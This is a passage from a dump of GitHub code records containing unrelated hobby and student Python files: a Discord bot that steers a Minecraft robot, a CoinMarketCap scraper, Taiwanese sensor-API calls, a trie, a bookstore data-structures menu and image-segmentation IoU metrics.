query(config, None, 'formatters', uid, 'args')\n if args and isinstance(args, list):\n return map(str, args)\n return None\n\ndef set_fix_cmds(cmd, uid):\n fix_cmds = query(config, None, 'formatters', uid, 'fix_commands')\n if fix_cmds and isinstance(fix_cmds, list) and cmd and isinstance(cmd, list):\n for x in fix_cmds:\n if isinstance(x, list):\n l = len(x)\n if 3 <= l <= 5:\n search = str(x[l-5])\n replace = str(x[l-4])\n index = int(x[l-3])\n count = int(x[l-2])\n position = int(x[l-1])\n if isinstance(index, int) and isinstance(count, int) and isinstance(position, int):\n for i, item in enumerate(cmd):\n item = str(item)\n if index == i:\n if l == 5:\n if search == item and position < 0:\n cmd.pop(i)\n else:\n cmd[i] = re.sub(r'%s' % search, replace, item, count)\n if l == 4:\n cmd[i] = replace\n if l == 3 and position < 0:\n cmd.pop(i)\n if position > -1:\n cmd.insert(position, cmd.pop(i))\n log.debug('Fixed arguments: %s', cmd)\n else:\n log.error('index, count and position of \"fix_commands\" must be of type int.')\n return None\n else:\n log.error('Items of \"fix_commands\" must be of type list.')\n return None\n return cmd\n\ndef prompt_error(text, name=None):\n if name:\n string = u'%s (%s):\\n\\n%s' % (PACKAGE_NAME, name, text)\n else:\n string = u'%s:\\n\\n%s' % (PACKAGE_NAME, text)\n sublime.error_message(string)\n\ndef setup_logger(name):\n formatter = logging.Formatter(fmt='▋[' + PACKAGE_NAME + '](%(threadName)s:%(filename)s#L%(lineno)s): [%(levelname)s] %(message)s')\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n if logger.hasHandlers():\n logger.handlers.clear()\n logger.addHandler(handler)\n return logger\n","repo_name":"bitst0rm-pub/Formatter","sub_path":"modules/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":18258,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"75"} +{"seq_id":"22947165301","text":"#!/usr/bin/python\n\nimport sys\n\nbyName = {}\nregionfile = sys.argv[1]\n\nfor line in open(regionfile):\n f = line.strip().split()\n name = f[3]\n if name in byName:\n byName[name] += line\n else:\n byName[name] = line\n\nfor name in byName:\n fh = open(\"%s.txt\" % (name), 'w')\n print >> fh, byName[name],\n fh.close()\n\n \n","repo_name":"vforget/rare-variant-pipeline","sub_path":"bin/01_split.py","file_name":"01_split.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"12447621863","text":"import sqlite3\nimport time\nimport matplotlib.pyplot as plt\n\n# Connect to the UsersDB database\nconn_usersdb = sqlite3.connect('UsersDB.sqlite')\ncur_usersdb = conn_usersdb.cursor()\n\n# cur_usersdb.executescript('''\n# DROP TABLE IF EXISTS PlotTable;\n#\n# CREATE TABLE PlotTable (\n# contest_id INTEGER,\n# rating_user1 INTEGER,\n# rating_user2 INTEGER\n# );\n# ''')\n\n# Extracting the data of the first User\ncur_usersdb.execute('''SELECT contest_id, newRating FROM User1''')\nuser1_data = cur_usersdb.fetchall()\n\n# Splitting contest_id's and ratings\ncontest_data1 = [data[0] for data in user1_data]\nrating_data1 = [data[1] for data in user1_data]\n\n# Extracting the data of the second User\ncur_usersdb.execute('''SELECT contest_id, newRating FROM User2''')\nuser2_data = cur_usersdb.fetchall()\n\n# Splitting contest_id's and ratings\ncontest_data2 = [data[0] for data in user2_data]\nrating_data2 = [data[1] for data in user2_data]\n\n# Plotting the details of the first User\nplt.plot(contest_data1, rating_data1, color = 'k', linestyle = '-',\n marker = 'o', markerfacecolor = 'k', linewidth = 1.5,\n label = 'User1')\n\n# Plotting the details of the second User\nplt.plot(contest_data2, rating_data2, color = 'r', linestyle = '-',\n marker = 'o', markerfacecolor = 'r', linewidth = 1.5,\n label = 'User2')\n\n# Plot Figure settings\nplt.grid(True)\nmy_plot = plt.gca()\n\n# Userful labels in graph\nplt.xlabel('Contest id\\'s')\nplt.ylabel('Rating')\nplt.title('Codeforces User Comparison with Rating Graph')\n\n# Getting the legent outside by shrinking the main box to 80% of its size\nbox = my_plot.get_position()\nmy_plot.set_position([box.x0, box.y0, box.width * 0.85, box.height])\nplt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))\n\n# Autoscaling the view\nmy_plot.autoscale_view(tight = None, scalex = 'True', scaley = 'True')\n\nplt.show()\n\n\n# for data in user1_data:\n# cur_usersdb.execute('''INSERT INTO PlotTable (contest_id, rating_user1)\n# VALUES (?, ?)''', data)\n# conn_usersdb.commit()\n#\n# cur_usersdb.execute('''SELECT contest_id, newRating FROM User2''')\n# user2_data = cur_usersdb.fetchall()\n#\n# for data in user2_data:\n# #cur_usersdb.execute('''SELECT contest_id FROM PlotTable\n# # WHERE ''')\n# cur_usersdb.execute('''INSERT OR IGNORE INTO PlotTable (contest_id)\n# VALUES (?)''', (data[0],))\n# cur_usersdb.execute('''UPDATE PlotTable SET rating_user2 = ?\n# WHERE contest_id = ?''', (data[1], data[0]))\n# conn_usersdb.commit()\n#\n# cur_usersdb.execute('SELECT * FROM PlotTable')\n# all_data = cur_usersdb.fetchall()\n# all_data = sorted(all_data)\n# for data in all_data:\n# print data\n# #print all_data\n# all_user1_data = [(data[0], data[1]) for data in all_data]\n# all_user2_data = [(data[0], data[2]) for data in all_data]\n#\n# #for data in all_data:\n# # print data\n#\n# contest_data = [data[0] for data in all_data]\n# user1_data = [data[1] for data in all_data]\n# user2_data = [data[2] for data in all_data]\n\n# plt.plot(contest_data, user1_data, color = 'k', linestyle = '-',\n# marker = 'o', markerfacecolor = 'k', label = 'user1')\n# plt.plot(contest_data, user2_data, label = 'user2')\n# plt.xlabel('Contest id\\'s')\n# plt.ylabel('Rating')\n# plt.title('Codeforces User Comparison with Rating Graph')\n# plt.legend()\n#\n# plt.show()\n\n# Closing the connection\nconn_usersdb.close()\n","repo_name":"shubhambhattar/Codeforces-Comparator","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"38333362821","text":"\nfrom utils import data_utils, settings\n\n\nname_to_pubs_test = data_utils.load_json(settings.GLOBAL_DATA_DIR, 'name_to_pubs_test_100.json')\nname_to_pubs_train = data_utils.load_json(settings.GLOBAL_DATA_DIR, 'name_to_pubs_train_500.json')\n\n# Train\nTrainAuthorCount = 0\nTrainPaperCount = 0\nfor name in name_to_pubs_train:\n TrainAuthorCount = TrainAuthorCount + 1\n object = name_to_pubs_train[name]\n for pid in object:\n TrainPaperCount = TrainPaperCount + 1\n\nprint (\"TrainAuthorCount: \", TrainAuthorCount)\nprint (\"TrainPaperCount: \", TrainPaperCount)\n\n# Test\nTestAuthorCount = 0\nTestPaperCount = 0\nfor name in name_to_pubs_test:\n TestAuthorCount = TestAuthorCount + 1\n object = name_to_pubs_test[name]\n for pid in object:\n TestPaperCount = TestPaperCount + 1\n\nprint (\"TestAuthorCount: \", TestAuthorCount)\nprint (\"TestPaperCount: \", TestPaperCount)\n\n\n","repo_name":"shanxuanchen/AttentionBasedNameDisambiguation","sub_path":"statistic/getTrainDataSets.py","file_name":"getTrainDataSets.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"29804023723","text":"from http import client\nimport socket\nimport discord\n\n\n#Тут указываем канал stem\nStem = input(\"Введите уникальный канал Stem \")\n#Token дискорд бота\nToken = input(\"Введите токин своего дискорд бота \")\n\nsock = socket.socket()\n\ndef safe_send(s):\n if isinstance(s, int): s = chr(s).encode('ascii')\n if isinstance(s, str): s = s.encode('utf-8')\n i = 0\n while i < len(s): i += sock.send(s[i:])\n\ndef send_package(_type, _id, _message=None):\n pack = chr(_type).encode('ascii')\n if _type == 3 or _type == 4:\n pack += _id\n else:\n pack += chr(len(_id)).encode('ascii')\n pack += _id.encode('utf-8')\n if _message: pack += _message.encode('utf-8')\n \n safe_send(len(pack) // 256)\n safe_send(len(pack) % 256)\n safe_send(pack)\n\ndef send(channel, msg):\n try:\n send_package(0, channel, msg)\n except ConnectionAbortedError:\n global sock\n sock = socket.socket()\n sock.connect(('stem.fomalhaut.me', 5733))\n send_package(0, channel, msg)\n\nsock.connect(('stem.fomalhaut.me', 5733))\n\nclass MyClient(discord.Client):\n async def on_message(self, message):\n if message.content.startswith('w'):\n await message.channel.send('Forward')\n print(\"Forward\")\n send(Stem, 'w')\n\n elif message.content.startswith('s'):\n await message.channel.send('Back')\n print(\"Back\")\n send(Stem, 's')\n\n elif message.content.startswith('d'):\n await message.channel.send('Turn Right')\n print(\"Turn Right\")\n send(Stem, 'd')\n\n elif message.content.startswith('a'):\n await message.channel.send('Turn Left')\n print(\"Turn Left\")\n send(Stem, 'a')\n \n elif message.content.startswith('z'):\n await message.channel.send('Down')\n print(\"Down\")\n send(Stem, 'z')\n\n elif message.content.startswith('x'):\n await message.channel.send('Up')\n print(\"Up\")\n send(Stem, 'x')\n\n elif message.content.startswith('g'):\n await message.channel.send('Place')\n print(\"Place\")\n send(Stem, 'g')\n \n elif message.content.startswith('t'):\n await message.channel.send('Drop')\n print(\"Drop\")\n send(Stem, 't')\n \nintents = discord.Intents(guilds=True, messages=True)\nclient = MyClient(intents=intents)\nclient.run(Token)","repo_name":"Bumer-32/Minecraft-opencomputers","sub_path":"DisRob/DisRob.py","file_name":"DisRob.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"38146001552","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[27]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport csv\nimport os\n\n\ndef get_coins():\n soup = create_soup(\"https://coinmarketcap.com/coins\")\n \n coin_names = []\n coin_symbols = []\n coin_urls = []\n \n coin_tags = soup.select(\".sc-16r8icm-0.dnwuAU\")\n for x in coin_tags:\n p_tags = x.find_all(\"p\")\n name = p_tags[0].text\n symbol = p_tags[1].text\n coin_names.append(name)\n coin_symbols.append(symbol)\n\n a_tags = x.find_all(\"a\", href = True)\n for a_tag in a_tags:\n tag = \"coinmarketcap.com\" + a_tag[\"href\"]\n coin_urls.append(tag)\n \n \n #Beautiful Soup seems to render the page differently. On analyzing the soup structure using .prettify() function\n #we see that top 10 coins have different class and the rest belong to some other class. \n #So we change the coin_tags to get tags with that class.\n \n coin_tags = soup.select(\".sc-14kwl6f-0.fletOv\")\n for i in coin_tags:\n coin_symbols.append(i.find(\"span\", attrs = {\"class\":\"crypto-symbol\"}).text)\n coin_urls.append(\"coinmarketcap.com\" + i.find(\"a\", attrs = {\"class\":\"cmc-link\"})[\"href\"])\n coin_names.append(i.find(\"span\", attrs = {\"class\":\"circle\"}).find_next().text)\n\n \n #Fetching just the top 50 coins\n coin_names = coin_names[:50]\n coin_symbols = coin_symbols[:50]\n coin_urls = coin_urls[:50]\n \n #Writing to the coins.csv file.\n with open('coins.csv', mode='w+') as coins_file:\n writer = csv.writer(coins_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n \n col_names = ['SNO', 'Name', \"Symbol\", \"URL\"]\n\n writer.writerow(col_names)\n for i in range(1, 51):\n row = [str(i), coin_names[i-1], coin_symbols[i-1], coin_urls[i-1]]\n writer.writerow(row)\n \n \ndef get_coin_data(coin_symbol):\n #Fetching the URL from coins.csv file\n url = fetch_url('coins.csv', coin_symbol)\n \n if url == None:\n print(\"No Such Coin Found\")\n return\n else:\n soup2 = create_soup(url)\n \n data_dict = {}\n \n #Fetching name, symbol, watchlist, website and supply chain %\n name_symbol_tag = soup2.select(\".sc-1q9q90x-0.iYFMbU.h1___3QSYG\")\n name = name_symbol_tag[0].text\n symbol = name_symbol_tag[0].find_next(\"small\").text\n name = name[:len(name) - len(symbol)]\n\n watchlist_tag = soup2.select(\".namePill___3p_Ii\")\n watchlist = watchlist_tag[2].text\n\n website_tag = soup2.select(\".button___2MvNi\")\n website = website_tag[0].text\n\n supply_chain_percent_tag = soup2.select(\".supplyBlockPercentage___1g1SF\")\n supply_chain_percent = supply_chain_percent_tag[0].text\n\n data_dict[\"Symbol\"] = symbol\n data_dict[\"Name\"] = name\n data_dict[\"Watchlist\"] = watchlist\n data_dict[\"Website\"] = website\n data_dict[\"Supply Chain %\"] = supply_chain_percent\n \n #Fetching price, volume/market cap, market dominance, rank, market cap, all time high and low data \n #from the table on the website\n th = soup2.select(\"th\")\n td = soup2.select(\"td\")\n for i in range(len(th)):\n if th[i].text == (name + \" Price\"):\n data_dict[\"Price\"] = td[i].text\n \n if th[i].text == \"Volume / Market Cap\":\n data_dict[\"Volume / Market Cap\"] = td[i].text\n \n if th[i].text == \"Market Dominance\":\n data_dict[\"Market Dominance\"] = td[i].text\n \n if th[i].text == \"Market Rank\":\n data_dict[\"Market Rank\"] = td[i].text\n \n if th[i].text == \"Market Cap\":\n data_dict[\"Market Cap\"] = td[i].find_next(\"span\").text\n \n if th[i].find_next(\"div\").text == \"All Time High\":\n data_dict[\"All Time High Date\"] = th[i].find_next(\"small\").text\n data_dict[\"All Time High Price\"] = td[i].find_next(\"span\").text\n \n if th[i].find_next(\"div\").text == \"All Time Low\":\n data_dict[\"All Time Low Date\"] = th[i].find_next(\"small\").text\n data_dict[\"All Time Low Price\"] = td[i].find_next(\"span\").text\n \n \n\n #Fetching basic info about the coin.\n #The id for this information's tag seems to have three different type- \n #1 -> #what-is--\n #2 -> #what-is-\n #3 -> The third type of id is used when the coin name is made of more than 1 word like Ethereum Classic. In that case \n #there is a hyphen between the words.\n if len(name.split(\" \")) > 1:\n name = name.replace(\" \", \"-\")\n what_tag_id = \"#what-is-\" + name.lower() + \"-\" + symbol.lower()\n what_tag = soup2.select(what_tag_id)\n\n if len(what_tag) == 0:\n what_tag_id = \"#what-is-\" + name.lower()\n what_tag = soup2.select(what_tag_id)\n if len(what_tag) == 0:\n data_dict[\"What is ?\"] = \"N/A\"\n\n else:\n what_tag = what_tag[0]\n what = \"\"\n while what_tag.find_next(\"p\"):\n if what_tag.find_next_sibling().name != \"p\":\n break\n what += what_tag.find_next(\"p\").text\n what_tag = what_tag.find_next(\"p\") \n data_dict[\"What is ?\"] = what\n\n else:\n what_tag = what_tag[0]\n what = \"\"\n while what_tag.find_next(\"p\"):\n if what_tag.find_next_sibling().name != \"p\":\n break\n what += what_tag.find_next(\"p\").text\n what_tag = what_tag.find_next(\"p\") \n data_dict[\"What is ?\"] = what\n \n \n #Fetching the Founder info of the coin.\n founder_tag_id = \"#who-are-the-founders-of-\" + name.lower()\n founder_tag = soup2.select(founder_tag_id)\n if len(founder_tag) == 0:\n data_dict[\"Who Are The Founders\"] = \"N/A\"\n else:\n founder_tag = founder_tag[0]\n founder = \"\"\n while founder_tag.find_next(\"p\"):\n if founder_tag.find_next_sibling().name != \"p\":\n break\n founder += founder_tag.find_next(\"p\").text\n founder_tag = founder_tag.find_next(\"p\")\n data_dict[\"Who Are The Founders\"] = founder\n\n \n #Fetching the unique things about the coin.\n unique_tag_id = \"#what-makes-\" + name.lower() + \"-unique\"\n unique_tag = soup2.select(unique_tag_id)\n if len(unique_tag) == 0:\n data_dict[\"What Makes it Unique\"] = \"N/A\"\n else:\n unique_tag = unique_tag[0]\n unique = \"\"\n ct = 0\n while True:\n if unique_tag.find_next_sibling().name != \"p\":\n break\n unique += unique_tag.find_next(\"p\").text\n unique_tag = unique_tag.find_next(\"p\")\n\n data_dict[\"What Makes it Unique\"] = unique\n \n \n \n col_names = ['Symbol', 'Name', 'Watchlist', 'Website', 'Supply Chain %', 'Price', 'Volume / Market Cap',\n 'Market Dominance', 'Market Rank', 'Market Cap', 'All Time High Date', 'All Time High Price',\n 'All Time Low Date', 'All Time Low Price', 'What is ?', 'Who Are The Founders',\n 'What Makes it Unique']\n \n #Storing in the File\n write_to_file(\"coins_data.csv\", col_names, data_dict)\n \n\n#Function to create a soup object\ndef create_soup(url):\n webpage = requests.get(url)\n soup = BeautifulSoup(webpage.text, 'lxml')\n return soup\n\n\n#Function to fetch the url\ndef fetch_url(filename, symbol):\n url = \"\"\n with open(filename, mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for row in csv_reader:\n if row[\"Symbol\"] == symbol:\n url = row[\"URL\"]\n \n if url == \"\":\n print(\"No Such Coin Found\")\n return None\n else:\n url = \"https://\" + url\n return url\n \n\n#Funtion to write a python dictionary to a csv file\ndef write_to_file(filename, col_names, data_dict):\n if os.path.isfile(filename):\n with open(filename, mode='a', encoding = \"utf-8\") as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames = col_names)\n writer.writerow(data_dict) \n csv_file.close()\n else:\n with open(filename, mode='w+', encoding = \"utf-8\") as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=col_names)\n writer.writeheader()\n writer.writerow(data_dict)\n csv_file.close()\n \n \n\n","repo_name":"pankajshivnani2001/ScrapingCoinmarketcap","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19647097518","text":"import requests\nimport json\n\n\n# 作业1 : 练习使用一个民生物联网 API,例如空气、地震等感测站所回传的纪录资料。\n# api request 中央气象局地震监测站 SensorThings API 服务网址 \nr = requests.get(\"https://sta.ci.taiwan.gov.tw/STA_Earthquake_v2/v1.0/Things\")\n\nresult_1 = json.loads(r.text)\nraw_data_q1 = result_1['value']\n\n\n# 作业2 : 练习操作 OGC SensorThings API,将环保局测站位置的资料抓取下来,并且观察下载资料的内容。\n\nr_q2 = requests.get(\"https://sta.ci.taiwan.gov.tw/STA_AirQuality_EPAIoT/v1.0/Things\")\n\nresult_2 = json.loads(r_q2.text)\nraw_data_q2 = result_2['value']\n\n\n\n# 作业3 : \n# 依据作业 2 所下载的各个环保局测站感测器的描述资料,进一步点选 Datastreams、Locations,\n# 以及 Datastreams 点选进入后,点选 Observations 的 URL,观察所下载到的资料内容,其中 Observations 内部是否包含个别感测器纪录的资料。\n\n# 以第一笔资料为例\n\nraw_data_q3 = raw_data_q2[0]\n\n\n# 取得 \"Datastreams@iot.navigationLink\" \n\nstream = raw_data_q3[\"Datastreams@iot.navigationLink\"]\n\n# 可透过取得 stream endpoint 打API获取资讯\n\nprint (stream)\n\n# 取得 \"Locations@iot.navigationLink\"\n\nlocation = raw_data_q3[\"Locations@iot.navigationLink\"]\n\n# 可透过取得 location endpoint 打API获取资讯\n\nprint(location)\n\n\n\n\n\n\n\n\n\n","repo_name":"HenryYHHsu/AIOT","sub_path":"D5/D5.py","file_name":"D5.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36876138564","text":"import network\nimport joblib\nimport numpy as np\nfrom keras.callbacks import EarlyStopping\n\ndef run():\n data = joblib.load('data/data.pkl')\n X, y = [], []\n for k, v in data.items():\n for vv in v:\n X.append(vv)\n y.append(k)\n\n model = network.building_network()\n print('Model summary...')\n print(model.summary())\n print('Training model...')\n\n early_stopping = EarlyStopping(patience=3)\n model.fit(np.array(X), np.array(y), batch_size=128, epochs=10, callbacks=[early_stopping])\n\n\nif __name__ == '__main__':\n run()","repo_name":"congson1293/signature_compare","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14747224936","text":"import random\n\nheros = [\"Shahrukh Khan\", \"Salman Khan\", \"Hrithik Roshan\", \"Amir Khan\", \"Ranveer Singh\"]\n\n\na = random.randint(0, len(heros))\n\nname = input(\"Enter your name: \")\n\nprint(name + \" looks like \" + heros[a])","repo_name":"sauravs1001/CodingChallengeFor100Days","sub_path":"Day-6/facebook_like_game.py","file_name":"facebook_like_game.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72912692081","text":"class Trie:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.childs = {};\n self.end = False;\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n \"\"\"\n crawl = self;\n \n for c in word:\n \n if not c in crawl.childs.keys():\n crawl.childs[c] = Trie();\n \n crawl = crawl.childs[c];\n \n crawl.end = True;\n \n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n \"\"\"\n crawl = self;\n \n for c in word:\n \n if not c in crawl.childs.keys():\n return False;\n \n crawl = crawl.childs[c];\n \n if crawl.end is True:\n return True;\n \n return False;\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n \"\"\"\n crawl = self;\n \n for c in prefix:\n \n if not c in crawl.childs.keys():\n return False;\n \n crawl = crawl.childs[c];\n \n \n return True;\n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)","repo_name":"AndreiFlorescu/Leetcode","sub_path":"Python3/208-implement-trie-prefix-tree.py","file_name":"208-implement-trie-prefix-tree.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22239340147","text":"import Calculator\nimport BookStore\nimport DLList\nimport ChainedHashTable\nimport BinaryTree\nimport BinarySearchTree\n\n\ndef menu_calculator() :\n calculator = Calculator.Calculator()\n option=\"\"\n while option != '0':\n print (\"\"\"\n 1 Check mathematical expression \n 2 Set variable to values\n 3 introduce expression\n 4 print expression\n 5 Evaluate expression\n 0 Return to main menu\n \"\"\")\n option=input() \n if option==\"1\":\n expression = input(\"Introduce the mathematical expression: \")\n if calculator.matched_expression(expression) :\n print(f\"{expression} is a valid expression\")\n else:\n print(f\"{expression} is invalid expression\")\n elif option == \"2\":\n key = input(\"Input your variable: \")\n if key != '':\n value =input(\"Input your value: \")\n calculator.set_variable(key,float(value))\n else:\n value = input(\"Introduce your value: \")\n calculator.set_variable(key,value)\n # calculator.set_variable(key, value)\n elif option == \"3\":\n x = 1\n while x == 1:\n expression = input(\"Introduce a valid mathematical expression: \")\n if calculator.matched_expression(expression):\n print(f\"{expression} is a valid expression\")\n x = 0\n\n else:\n print(f\"{expression} is invalid expression\")\n x = 1\n\n\n elif option == \"4\":\n for i in expression:\n if calculator.dict.find(i) == None:\n print(i, end='')\n else:\n print(calculator.dict.find(i), end='')\n elif option == \"5\":\n print(calculator.evaluate(expression))\n\n\n ''' \n Add the menu options when needed\n '''\n\ndef menu_bookstore_system() :\n bookStore = BookStore.BookStore()\n option=\"\"\n while option != '0':\n print(\"\"\"\n s FIFO shopping cart\n r Random shopping cart\n 1 Load book catalog\n 2 Remove a book by index from catalog\n 3 Add a book by index to shopping cart\n 4 Remove from the shopping cart\n 5 Search book by infix\n 6 Reverse the order of the shopping cart\n 7 Best selling book\n 8 search by title(new function)\n 9 search by prefix( binary lab)\n 10 Traverse through bookstore txt\n 11 SEARCH BESTSELLING(BINARY HEAP)\n 12 merge sort\n 13 quick sort\n 14 prefix binary search\n 15 bfs search\n 16 dfs search\n 0 Return to main menu\n \"\"\")\n option=input() \n if option==\"r\":\n bookStore.setRandomShoppingCart()\n elif option==\"s\":\n bookStore.setShoppingCart()\n elif option==\"1\":\n file_name = input(\"Introduce the name of the file: \")\n bookStore.loadCatalog(file_name) \n #bookStore.pathLength(0, 159811)\n elif option==\"2\":\n i = int((\"Introduce the index to remove from catalog: \"))\n bookStore.removeFromCatalog(i)\n elif option==\"3\":\n i = int(input(\"Introduce the index to add to shopping cart: \"))\n bookStore.addBookByIndex(i)\n elif option==\"4\":\n bookStore.removeFromShoppingCart()\n elif option==\"5\":\n infix = input(\"Introduce the query to search: \")\n bookStore.searchBookByInfix(infix)\n elif option==\"6\":\n bookStore.reverseshoppingCart()\n elif option==\"7\":\n bookStore.bestSelling()\n elif option==\"8\":\n title = input(\"Introduce the title:\")\n bookStore.title_of_book(title)\n elif option == \"9\":\n prefix = input(\"Introduce prefix: \")\n bookStore.indexSortedTitle(prefix)\n elif option == \"10\":\n choice = \"\"\n while choice != \"0\":\n print(\"\"\"\n 1 Test In Order Traversal\n 2 Test Pre Order Traversal\n 3 Test Post Order Traversal\n 4 Test Breath First Traversal\n 0 Return to Bookstore System menu\n \"\"\")\n choice = input()\n if choice == \"1\":\n in_order = bookStore.sortedTitle.in_order(bookStore.sortedTitle.r, [])\n for book in in_order:\n with open(\"books_in_order.txt\", \"a\", encoding='UTF8') as f:\n f.write(f\"\\n{book}\")\n\n elif choice == \"2\":\n pre_order = bookStore.sortedTitle.pre_order(bookStore.sortedTitle.r, [])\n for book in pre_order:\n with open(\"books_pre_order.txt\", \"a\", encoding='UTF8') as f:\n f.write(f\"\\n{book}\")\n\n elif choice == \"3\":\n post_order = bookStore.sortedTitle.post_order(bookStore.sortedTitle.r, [])\n for book in post_order:\n with open(\"books_post_order.txt\", \"a\", encoding='UTF8') as f:\n f.write(f\"\\n{book}\")\n\n elif choice == \"4\":\n breath_first_order = bookStore.sortedTitle.bf_traverse()\n for book in breath_first_order:\n with open(\"books_bftraversal.txt\", \"a\", encoding='UTF8') as f:\n f.write(f\"\\n{book}\")\n elif option == \"11\":\n prefix = input(\"Introduce prefix: \")\n bookStore.SearchInfixBestSelling(prefix)\n elif option == \"12\":\n bookStore.mergeSort()\n elif option == \"13\":\n bookStore.quickSort()\n elif option == \"14\":\n prefix = str(input(\"enter prefix: \"))\n bookStore.binarySearchbyTitle(prefix)\n elif option == \"15\":\n index = int(input(\"Enter the index of the starting book: \"))\n index_location = int(input(\"Enter the distance from the starting index: \"))\n x = bookStore.similarGraph.bfs2(index, index_location)\n for i in range(1, len(x)):\n print(bookStore.bookCatalog.get(x[i]))\n elif option == \"16\":\n pointer_1 = int(input(\"Enter the starting book index: \"))\n pointer_2 = int(input(\"Enter the reaching index: \"))\n result = bookStore.similarGraph.dfs2(pointer_1,pointer_2)\n print(\"the degree of seperation is: \", result)\n\n # elif option == \"12\":\n # choice = \"\"\n # prefix = input(\"enter a book title: \")\n # if prefix == \"\":\n # return None\n # while choice != \"0\":\n # print(\"Choose the following option to sort the books\")\n # print(\"\"\"\n # 1 Merge Sort\n # 2 Quick Sort\n # 0 Return to main menu\n #\n #\n # \"\"\")\n # choice = input()\n # if choice == \"1\" or choice == \"2\":\n # bookStore.SortableBooks(prefix, choice)\n\n\n\n\n\n ''' \n Add the menu options when needed\n '''\ndef the_DLList():\n dLList = DLList.DLList()\n option =\"\"\n while option != '0':\n print(\"\"\"\n 1 Add a element\n 2 Remove element\n 3 Check if Palindrome\n 4 Print out List\n 0 Return to Main menu\n \"\"\")\n option=input()\n if option==\"1\":\n append_value =input(\"Please enter a value: \")\n dLList.append(append_value)\n elif option==\"2\":\n remove_value = input(\"Please enter a value: \")\n if remove_value in dLList:\n dLList.remove(remove_value)\n else:\n print(\"Value is not in the list\")\n elif option==\"3\":\n print(dLList.isPalindrome())\n elif option==\"4\":\n print(dLList)\ndef traversal_function():\n y = BinaryTree.BinaryTree()\n x = BinarySearchTree.BinarySearchTree()\n option = \"\"\n while option != '0':\n print(\"\"\"\n 1 Add Elements\n 2 Pre-Order\n 3 In-Order\n 4 Post-Order\n 5 Breath First\n 6 Height\n 0 Return to Main menu\n \"\"\")\n option=input()\n l = list()\n if option==\"1\":\n node = input(\"Enter Node: \")\n value = input(\"Introduce Node value: \")\n x.add(node,value)\n elif option==\"2\":\n x.pre_order(x.r, l)\n print(', '.join(map(str, l)))\n elif option==\"3\":\n x.in_order(x.r, l)\n print(', '.join(map(str, l)))\n elif option==\"4\":\n x.post_order(x.r, l)\n print(', '.join(map(str, l)))\n elif option==\"5\":\n print(x.bf_traverse())\n elif option==\"6\":\n print(x.height())\n\n\n\n\n#main: Create the main menu\ndef main() :\n option=\"\"\n while option != '0':\n print (\"\"\"\n 1 Calculator\n 2 Bookstore System\n 3 DLList\n 4 traversal and Height\n 0 Exit/Quit\n \"\"\")\n option=input() \n \n if option==\"1\":\n menu_calculator()\n elif option==\"2\":\n menu_bookstore_system()\n elif option==\"3\":\n the_DLList()\n elif option == \"4\":\n traversal_function()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"daxile6/BookStore-System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21972403450","text":"import tensorflow as tf\r\nimport numpy as np\r\nfrom keras import backend as K\r\n\r\n# src: https://www.kaggle.com/aglotero/another-iou-metric\r\ndef get_iou_vector(A, B):\r\n batch_size = A.shape[0]\r\n metric = []\r\n for batch in range(batch_size):\r\n t, p = A[batch]>0, B[batch]>0 \r\n intersection = np.logical_and(t, p)\r\n union = np.logical_or(t, p)\r\n iou = (np.sum(intersection > 0) + 1e-10 )/ (np.sum(union > 0) + 1e-10)\r\n thresholds = np.arange(0.5, 1, 0.05)\r\n s = []\r\n for thresh in thresholds:\r\n s.append(iou > thresh)\r\n metric.append(np.mean(s))\r\n\r\n return np.mean(metric)\r\n\r\n# src: https://www.kaggle.com/aglotero/another-iou-metric\r\ndef tf_iou_metric(label, pred):\r\n return tf.py_func(get_iou_vector, [label, pred>0.5], tf.float64)\r\n\r\n# src: https://www.kaggle.com/aglotero/another-iou-metric\r\ndef tf_iou_metric_2(label, pred):\r\n return tf.py_func(get_iou_vector, [label, pred>0.5], tf.float64)\r\n\r\n# code download from: 